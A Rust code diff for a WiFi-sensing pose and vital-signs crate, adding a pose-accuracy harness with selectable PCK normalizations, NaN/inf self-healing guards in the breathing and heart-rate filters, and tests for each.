|
||||
);
|
||||
assert_eq!(report.n_frames, 2);
|
||||
assert_eq!(report.n_keypoints, 17);
|
||||
assert_eq!(report.normalization, PckNormalization::TorsoDiameter);
|
||||
// PCK@20: 2 correct / 4 visible = 0.5.
|
||||
assert!((report.pck(20).unwrap() - 0.5).abs() < 1e-6);
|
||||
// PCK@50: τ = 0.5·0.20 = 0.10, frame B err 0.05 ≤ 0.10 ⇒ all correct
|
||||
// ⇒ 4/4 = 1.0.
|
||||
assert!((report.pck(50).unwrap() - 1.0).abs() < 1e-6);
|
||||
// A reported number always carries its definition in the summary.
|
||||
assert!(report.summary().contains("torso-diameter"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn accuracy_report_empty_is_zero_not_nan() {
|
||||
let report = accuracy_report(&[], &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.n_frames, 0);
|
||||
assert_eq!(report.pck(20), Some(0.0));
|
||||
assert_eq!(report.mpjpe, 0.0);
|
||||
assert!(!report.mpjpe.is_nan());
|
||||
}
|
||||
|
||||
// -------- bbox-norm is looser than torso-norm (sanity, on a batch) --------
|
||||
#[test]
|
||||
fn bbox_norm_scores_at_least_torso_norm() {
|
||||
// bbox diagonal >= torso span always (bbox encloses the hips), so for the
|
||||
// SAME frames bbox-PCK >= torso-PCK at the same k. Pin this ordering.
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10),
|
||||
(5, 0.50, 0.40),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.55, 0.10),
|
||||
(5, 0.58, 0.40),
|
||||
(CANON_LEFT_HIP, 0.42, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.62, 0.90),
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame = PoseFrame { pred, gt, visibility: vis };
|
||||
let torso = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::TorsoDiameter);
|
||||
let bbox = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert!(
|
||||
bbox.pck(20).unwrap() >= torso.pck(20).unwrap(),
|
||||
"bbox-norm (looser) must be >= torso-norm: bbox={:?} torso={:?}",
|
||||
bbox.pck(20), torso.pck(20)
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -43,6 +43,11 @@
|
||||
// All *this* crate's code is written without unsafe blocks.
|
||||
#![warn(missing_docs)]
|
||||
|
||||
/// Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173)
|
||||
/// — selectable `PckNormalization` (torso / bbox-diagonal / absolute), `mpjpe`,
|
||||
/// and a self-describing `PoseAccuracy` result so a reported PCK number always
|
||||
/// carries the definition it was computed under.
|
||||
pub mod accuracy;
|
||||
pub mod config;
|
||||
pub mod dataset;
|
||||
pub mod domain;
|
||||
@@ -89,6 +94,11 @@ pub use metrics_core::{
|
||||
canonical_torso_size, oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP,
|
||||
COCO_KP_SIGMAS,
|
||||
};
|
||||
// ADR-155 §Tier-1.2 — metric-locked accuracy harness (selectable PCK
|
||||
// normalization + MPJPE + self-describing result).
|
||||
pub use accuracy::{
|
||||
accuracy_report, mpjpe as pck_mpjpe, pck_at, PckNormalization, PoseAccuracy, PoseFrame,
|
||||
};
|
||||
pub use config::TrainingConfig;
|
||||
pub use dataset::{
|
||||
CsiDataset, CsiSample, DataLoader, MmFiDataset, SyntheticConfig, SyntheticCsiDataset,
|
||||
|
||||
@@ -29,6 +29,66 @@
|
||||
|
||||
use ndarray::{Array1, Array2};
|
||||
use wifi_densepose_train::{oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP};
|
||||
// ADR-155 §Tier-1.2 — metric-locked accuracy harness public surface.
|
||||
use wifi_densepose_train::{accuracy_report, pck_at, PckNormalization, PoseFrame};
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
// Metric-locked accuracy harness: the three PCK normalizations are reachable
|
||||
// from the crate root and give DIFFERENT PCK on identical predictions — the
|
||||
// proof that the 96 / 81.6 / 61 figures were non-comparable (validated here as
|
||||
// a downstream consumer would call it).
|
||||
// ---------------------------------------------------------------------------
|
||||
|
||||
/// Identical predictions, three declared normalizations ⇒ three distinct PCK.
|
||||
/// Hand calc (all coords in `[0,1]`):
|
||||
/// * GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30), hips=(0.40,0.90)/(0.60,0.90).
|
||||
/// * Pred: nose err 0.06, shoulder err 0.10, hips exact.
|
||||
/// * torso = 0.20 ⇒ τ@20 = 0.04 ⇒ only hips correct ⇒ 2/4 = **0.50**.
|
||||
/// * bbox = √(0.20²+0.80²)=0.82462 ⇒ τ@20 = 0.16492 ⇒ all correct ⇒ **1.00**.
|
||||
/// * abs(0.08): nose 0.06≤0.08 ok, shoulder 0.10>0.08 wrong ⇒ 3/4 = **0.75**.
|
||||
#[test]
|
||||
fn harness_three_normalizations_differ_from_crate_root() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10),
|
||||
(5, 0.50, 0.30),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.56, 0.10),
|
||||
(5, 0.60, 0.30),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
|
||||
let (_, _, torso) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
let (_, _, bbox) = pck_at(&pred, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal);
|
||||
let (_, _, abs) = pck_at(&pred, &gt, &vis, 20, PckNormalization::AbsolutePixels(0.08));
|
||||
|
||||
assert!((torso - 0.50).abs() < 1e-6, "torso PCK 0.50, got {torso}");
|
||||
assert!((bbox - 1.00).abs() < 1e-6, "bbox PCK 1.00, got {bbox}");
|
||||
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK 0.75, got {abs}");
|
||||
assert!(
|
||||
torso != bbox && bbox != abs && torso != abs,
|
||||
"three normalizations must be distinct: {torso} / {bbox} / {abs}"
|
||||
);
|
||||
}
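The hand calculation in the doc comment above can be reproduced without the crate. The following is a minimal sketch, not the crate's `pck_at`: the helpers `dist`, `pck`, `bbox_diagonal`, and `three_pcks` are hypothetical names. It assumes the torso size is the hip-to-hip distance, the bounding box is taken over the ground-truth points, and the absolute variant uses 0.08 directly as the threshold, as the hand calculation does.

```rust
type Pt = (f64, f64);

/// Euclidean distance between two points.
fn dist(a: Pt, b: Pt) -> f64 {
    ((a.0 - b.0).powi(2) + (a.1 - b.1).powi(2)).sqrt()
}

/// Fraction of keypoints whose prediction error is at most `tau`.
fn pck(pred: &[Pt], gt: &[Pt], tau: f64) -> f64 {
    let correct = pred
        .iter()
        .zip(gt)
        .filter(|(p, g)| dist(**p, **g) <= tau)
        .count();
    correct as f64 / gt.len() as f64
}

/// Diagonal of the axis-aligned box enclosing the ground-truth points.
fn bbox_diagonal(gt: &[Pt]) -> f64 {
    let (mut x0, mut x1, mut y0, mut y1) = (f64::MAX, f64::MIN, f64::MAX, f64::MIN);
    for &(x, y) in gt {
        x0 = x0.min(x);
        x1 = x1.max(x);
        y0 = y0.min(y);
        y1 = y1.max(y);
    }
    dist((x0, y0), (x1, y1))
}

/// Returns (torso, bbox, absolute) PCK for the four keypoints of the hand calc.
fn three_pcks() -> (f64, f64, f64) {
    // Order: nose, left shoulder, left hip, right hip.
    let gt = [(0.50, 0.10), (0.50, 0.30), (0.40, 0.90), (0.60, 0.90)];
    let pred = [(0.56, 0.10), (0.60, 0.30), (0.40, 0.90), (0.60, 0.90)];
    let k = 0.20; // PCK@20
    let torso = dist(gt[2], gt[3]); // hip-to-hip span = 0.20
    (
        pck(&pred, &gt, k * torso),              // tau = 0.04
        pck(&pred, &gt, k * bbox_diagonal(&gt)), // tau ~ 0.165
        pck(&pred, &gt, 0.08),                   // fixed threshold
    )
}
```

The same predictions score 0.50, 1.00, and 0.75 under the three thresholds, which is why a PCK figure reported without its normalization cannot be compared with another.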
|
||||
|
||||
/// `accuracy_report` returns a self-describing result carrying its normalization,
|
||||
/// so an unlabeled PCK number is structurally impossible at the API boundary.
|
||||
#[test]
|
||||
fn harness_report_carries_normalization_label() {
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis };
|
||||
let report = accuracy_report(&[frame], &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.normalization, PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.n_keypoints, 17);
|
||||
assert_eq!(report.n_frames, 1);
|
||||
assert!((report.pck(20).unwrap() - 1.0).abs() < 1e-6);
|
||||
assert!(report.summary().contains("bbox-diagonal"));
|
||||
}
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
// Tests that use `EvalMetrics` (requires tch-backend because the metrics
|
||||
|
||||
@@ -174,6 +174,20 @@ impl BreathingExtractor {
|
||||
let output =
|
||||
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
|
||||
|
||||
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
|
||||
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
|
||||
// overflow — would otherwise be stored into `y1`/`y2` and poison the
|
||||
// resonator recurrence *permanently*: every subsequent output stays
|
||||
// NaN, the `extract()` finite-check drops it, and the history buffer
|
||||
// never refills, so breathing extraction is dead until `reset()`.
|
||||
// Resetting the filter state here lets the resonator recover on the next
|
||||
// clean frame; the 0.0 we return for this frame is still dropped by the
|
||||
// caller's `is_finite()` check, so no spurious sample enters history.
|
||||
if !output.is_finite() {
|
||||
*state = IirState::default();
|
||||
return 0.0;
|
||||
}
|
||||
|
||||
state.x2 = state.x1;
|
||||
state.x1 = input;
|
||||
state.y2 = state.y1;
|
||||
@@ -396,6 +410,75 @@ mod tests {
|
||||
assert!((0.0..=2.0).contains(&fused), "weighted average must be in-range: {fused}");
|
||||
}
|
||||
|
||||
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
|
||||
/// permanently poison the IIR filter state.
|
||||
///
|
||||
/// The resonator recurrence stores `y[n]` into the filter state. Before the
|
||||
/// fix, one NaN/inf residual produced a NaN `output`, the `extract()`
|
||||
/// finite-guard dropped that frame from history — but the NaN was already
|
||||
/// latched into `state.y1`/`y2`, so every subsequent output stayed NaN, the
|
||||
/// finite-guard rejected it too, and the history buffer never refilled.
|
||||
/// Breathing extraction was then dead until `reset()`. A control run on the
|
||||
/// same clean signal yields 15 BPM (0.25 Hz); after a leading NaN frame the
|
||||
/// OLD code returned `None` with `history_len() == 0` forever. This test
|
||||
/// asserts recovery (FAILS on the old code, verified by reverting the
|
||||
/// `bandpass_filter` self-heal).
|
||||
#[test]
|
||||
fn nan_frame_does_not_permanently_poison_filter() {
|
||||
let sr = 10.0;
|
||||
let feed_clean = |ext: &mut BreathingExtractor| {
|
||||
let mut last = None;
|
||||
for i in 0..600 {
|
||||
let t = i as f64 / sr;
|
||||
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
|
||||
last = ext.extract(&[s], &[1.0]);
|
||||
}
|
||||
last
|
||||
};
|
||||
|
||||
// Control: clean signal accumulates history and detects ~15 BPM.
|
||||
let mut control = BreathingExtractor::new(1, sr, 60.0);
|
||||
let control_res = feed_clean(&mut control);
|
||||
assert!(control.history_len() > 0);
|
||||
assert!(control_res.is_some(), "control clean run must produce an estimate");
|
||||
|
||||
// A leading NaN frame must not kill the extractor.
|
||||
let mut ext = BreathingExtractor::new(1, sr, 60.0);
|
||||
ext.extract(&[f64::NAN], &[1.0]);
|
||||
let res = feed_clean(&mut ext);
|
||||
assert!(
|
||||
ext.history_len() > 0,
|
||||
"extractor must recover and refill history after a NaN frame (got {})",
|
||||
ext.history_len()
|
||||
);
|
||||
assert!(res.is_some(), "extractor must recover an estimate after a NaN frame");
|
||||
}
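The failure mode and the fix described above can be shown in isolation. This is a minimal sketch under stated assumptions, not the crate's code: `bandpass_step` and `finite_outputs_after_nan` are hypothetical names, `r` and `cos_w0` are passed in directly rather than derived from a band and sample rate, the final `state.y1 = output` assignment is inferred from the recurrence, and `IirState::default()` is assumed to be all zeros.

```rust
/// Filter memory for a 2nd-order resonator (field names follow the diff).
#[derive(Debug, Default, Clone, Copy, PartialEq)]
struct IirState {
    x1: f64,
    x2: f64,
    y1: f64,
    y2: f64,
}

/// One resonator step with the self-healing guard.
/// `r` is the pole radius (assumed < 1) and `cos_w0` the cosine of the
/// centre frequency in radians per sample; both are assumptions here.
fn bandpass_step(state: &mut IirState, input: f64, r: f64, cos_w0: f64) -> f64 {
    let output =
        (1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;

    // Never latch a non-finite value into the recurrence: clear the
    // state and hand back a placeholder for the caller to discard.
    if !output.is_finite() {
        *state = IirState::default();
        return 0.0;
    }

    state.x2 = state.x1;
    state.x1 = input;
    state.y2 = state.y1;
    state.y1 = output;
    output
}

/// Feeds one NaN sample, then `n` clean 0.25 Hz sine samples at 10 Hz,
/// and counts how many of the clean-frame outputs are finite.
fn finite_outputs_after_nan(n: usize) -> usize {
    let (r, sr, f0) = (0.9, 10.0, 0.25);
    let cos_w0 = (2.0 * std::f64::consts::PI * f0 / sr).cos();
    let mut state = IirState::default();
    bandpass_step(&mut state, f64::NAN, r, cos_w0);
    (0..n)
        .map(|i| (2.0 * std::f64::consts::PI * f0 * i as f64 / sr).sin())
        .map(|s| bandpass_step(&mut state, s, r, cos_w0))
        .filter(|y| y.is_finite())
        .count()
}
```

With the guard removed, the NaN would be stored in `y1` and every later output would be NaN, so the count would be zero. With it, every clean frame after the bad one yields a finite output.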
|
||||
|
||||
/// ADR-158 §A1: a mid-stream `inf` must not freeze the history buffer.
|
||||
#[test]
|
||||
fn inf_mid_stream_does_not_freeze_history() {
|
||||
let sr = 10.0;
|
||||
let mut ext = BreathingExtractor::new(1, sr, 60.0);
|
||||
let clean = |ext: &mut BreathingExtractor, count: usize| {
|
||||
for i in 0..count {
|
||||
let t = i as f64 / sr;
|
||||
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
|
||||
ext.extract(&[s], &[1.0]);
|
||||
}
|
||||
};
|
||||
clean(&mut ext, 300);
|
||||
let before = ext.history_len();
|
||||
assert!(before > 0);
|
||||
ext.extract(&[f64::INFINITY], &[1.0]); // poison mid-stream
|
||||
clean(&mut ext, 600);
|
||||
assert!(
|
||||
ext.history_len() > before,
|
||||
"history must keep growing after an inf frame (before={}, after={})",
|
||||
before,
|
||||
ext.history_len()
|
||||
);
|
||||
}
|
||||
|
||||
/// ADR-157 §A3 bug-catching test. Divergence needs the pole magnitude
|
||||
/// `|r| >= 1`, i.e. `bw >= 4`. At `fs = 0.5` Hz with the band widened to
|
||||
/// 0.1-0.9 Hz, `bw = 2*pi*(0.9-0.1)/0.5 = 10.05`, so the OLD pole radius
|
||||
|
||||
@@ -32,6 +32,15 @@ impl Default for IirState {
|
||||
}
|
||||
}
|
||||
|
||||
/// Lowest physiologically plausible heart rate, in BPM. Estimates below this
|
||||
/// (e.g. a lock onto a breathing harmonic, which the firmware #987 fix also
|
||||
/// guards against) are rejected rather than emitted as a confident vital — a
|
||||
/// false low HR is a safety problem. Value-identical to the prior literal.
|
||||
const HR_PLAUSIBLE_MIN_BPM: f64 = 40.0;
|
||||
/// Highest physiologically plausible heart rate, in BPM. Estimates above this
|
||||
/// are rejected. Value-identical to the prior literal.
|
||||
const HR_PLAUSIBLE_MAX_BPM: f64 = 180.0;
|
||||
|
||||
/// Heart rate extractor using bandpass filtering and autocorrelation
|
||||
/// peak detection.
|
||||
pub struct HeartRateExtractor {
|
||||
@@ -140,8 +149,11 @@ impl HeartRateExtractor {
|
||||
let frequency_hz = self.sample_rate / period_samples as f64;
|
||||
let bpm = frequency_hz * 60.0;
|
||||
|
||||
// Validate BPM is in physiological range (40-180 BPM)
|
||||
if !(40.0..=180.0).contains(&bpm) {
|
||||
// Validate BPM is in the physiological plausibility band. An estimate
|
||||
// outside [HR_PLAUSIBLE_MIN_BPM, HR_PLAUSIBLE_MAX_BPM] is rejected
|
||||
// rather than emitted, so an out-of-band autocorrelation lock can never
|
||||
// surface as a confident heart rate.
|
||||
if !(HR_PLAUSIBLE_MIN_BPM..=HR_PLAUSIBLE_MAX_BPM).contains(&bpm) {
|
||||
return None;
|
||||
}
|
||||
|
||||
@@ -191,6 +203,20 @@ impl HeartRateExtractor {
|
||||
let output =
|
||||
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
|
||||
|
||||
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
|
||||
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
|
||||
// overflow — would otherwise be written into `y1`/`y2` and poison the
|
||||
// resonator recurrence *permanently*: every later output stays NaN, the
|
||||
// `extract()` finite-check drops it, `acf0` never recomputes on fresh
|
||||
// data, and heart-rate extraction is dead until `reset()`. Resetting the
|
||||
// filter state here lets the resonator recover on the next clean frame;
|
||||
// the 0.0 returned for this frame is still dropped by the caller's
|
||||
// `is_finite()` check, so no spurious sample enters history.
|
||||
if !output.is_finite() {
|
||||
*state = IirState::default();
|
||||
return 0.0;
|
||||
}
|
||||
|
||||
state.x2 = state.x1;
|
||||
state.x1 = input;
|
||||
state.y2 = state.y1;
|
||||
@@ -420,6 +446,92 @@ mod tests {
|
||||
assert_eq!(ext.n_subcarriers, 56);
|
||||
}
|
||||
|
||||
/// Pin the physiological plausibility band to its documented values. If a
|
||||
/// future edit widens these, an implausible HR could be emitted as a
|
||||
/// confident vital — this characterization test forces that to be a
|
||||
/// deliberate, reviewed change.
|
||||
#[test]
|
||||
fn plausibility_band_constants_pinned() {
|
||||
assert!((HR_PLAUSIBLE_MIN_BPM - 40.0).abs() < f64::EPSILON);
|
||||
assert!((HR_PLAUSIBLE_MAX_BPM - 180.0).abs() < f64::EPSILON);
|
||||
}
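The plausibility clamp that these constants feed can be sketched as a standalone function. This is an illustration only: `plausible_bpm` is a hypothetical helper, not a function in the crate. It mirrors the lag-to-BPM conversion and range check shown in the `HeartRateExtractor` hunk.

```rust
const HR_PLAUSIBLE_MIN_BPM: f64 = 40.0;
const HR_PLAUSIBLE_MAX_BPM: f64 = 180.0;

/// Hypothetical helper: convert an autocorrelation peak lag (in samples)
/// into BPM and reject anything outside the plausibility band.
fn plausible_bpm(sample_rate: f64, period_samples: usize) -> Option<f64> {
    let frequency_hz = sample_rate / period_samples as f64;
    let bpm = frequency_hz * 60.0;
    // A zero lag gives an infinite BPM, which the range check also rejects.
    if !(HR_PLAUSIBLE_MIN_BPM..=HR_PLAUSIBLE_MAX_BPM).contains(&bpm) {
        return None;
    }
    Some(bpm)
}
```

At a 50 Hz sample rate, a 50-sample lag maps to 60 BPM and is accepted, while lags of 10 samples (300 BPM) and 100 samples (30 BPM) are both rejected.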
|
||||
|
||||
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
|
||||
/// permanently poison the IIR filter state.
|
||||
///
|
||||
/// The cardiac resonator latches `y[n]` into `state.y1`/`y2`. Before the
|
||||
/// fix, one NaN/inf residual produced a NaN `output` that was stored into
|
||||
/// the state; the `extract()` finite-guard dropped that frame from history,
|
||||
/// but every subsequent output stayed NaN, so the history buffer never
|
||||
/// refilled and HR extraction was dead until `reset()`. After a leading NaN
|
||||
/// frame, the OLD code returned `None` with `history_len() == 0` forever.
|
||||
/// This asserts recovery (FAILS on the old code).
|
||||
#[test]
|
||||
fn nan_frame_does_not_permanently_poison_filter() {
|
||||
let sr = 50.0;
|
||||
let feed_clean = |ext: &mut HeartRateExtractor| {
|
||||
let mut last = None;
|
||||
for i in 0..1200 {
|
||||
let t = i as f64 / sr;
|
||||
let base = (2.0 * std::f64::consts::PI * 1.2 * t).sin();
|
||||
let r = vec![base * 0.1, base * 0.08, base * 0.12, base * 0.09];
|
||||
last = ext.extract(&r, &[0.0, 0.01, 0.02, 0.03]);
|
||||
}
|
||||
last
|
||||
};
|
||||
|
||||
let mut control = HeartRateExtractor::new(4, sr, 20.0);
|
||||
feed_clean(&mut control);
|
||||
assert!(control.history_len() > 0, "control clean run must accumulate history");
|
||||
|
||||
let mut ext = HeartRateExtractor::new(4, sr, 20.0);
|
||||
ext.extract(&[f64::NAN, 0.1, 0.1, 0.1], &[0.0, 0.01, 0.02, 0.03]);
|
||||
feed_clean(&mut ext);
|
||||
assert!(
|
||||
ext.history_len() > 0,
|
||||
"HR extractor must recover and refill history after a NaN frame (got {})",
|
||||
ext.history_len()
|
||||
);
|
||||
}
|
||||
|
||||
/// Safety negative: pure broadband noise (no cardiac component) must NOT be
|
||||
/// reported as a clinically `Valid` heart rate. A false "HR = 72 bpm" on
|
||||
/// noise is a safety problem (false reassurance / false alert). The
|
||||
/// extractor may still emit a low-confidence guess, but its status must be
|
||||
/// `Degraded`/`Unreliable`, never `Valid`. Mirrors the honest-negative
|
||||
/// requirement in the review brief.
|
||||
#[test]
|
||||
fn pure_noise_is_never_reported_valid() {
|
||||
let mut seed: u64 = 0x1234_5678;
|
||||
let mut rng = || {
|
||||
seed = seed
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
((seed >> 33) as f64 / (1u64 << 31) as f64) - 1.0
|
||||
};
|
||||
let mut ext = HeartRateExtractor::new(8, 50.0, 20.0);
|
||||
let mut last = None;
|
||||
for _ in 0..1500 {
|
||||
let r: Vec<f64> = (0..8).map(|_| rng()).collect();
|
||||
let p: Vec<f64> = (0..8).map(|_| rng()).collect();
|
||||
last = ext.extract(&r, &p);
|
||||
}
|
||||
if let Some(est) = last {
|
||||
assert_ne!(
|
||||
est.status,
|
||||
VitalStatus::Valid,
|
||||
"pure noise must not yield a clinically Valid HR (bpm={}, conf={})",
|
||||
est.value_bpm,
|
||||
est.confidence
|
||||
);
|
||||
assert!(
|
||||
est.confidence < 0.6,
|
||||
"noise HR confidence must stay below the Valid cutoff: {}",
|
||||
est.confidence
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
/// ADR-157 §A3 bug-catching test.
|
||||
///
|
||||
/// Divergence needs the pole *magnitude* `|r| >= 1`, i.e. `bw >= 4`. With
|
||||
|
||||
Vendored
+1
-1
Submodule vendor/rufield updated: ba66e2e0a6...509d8ae29e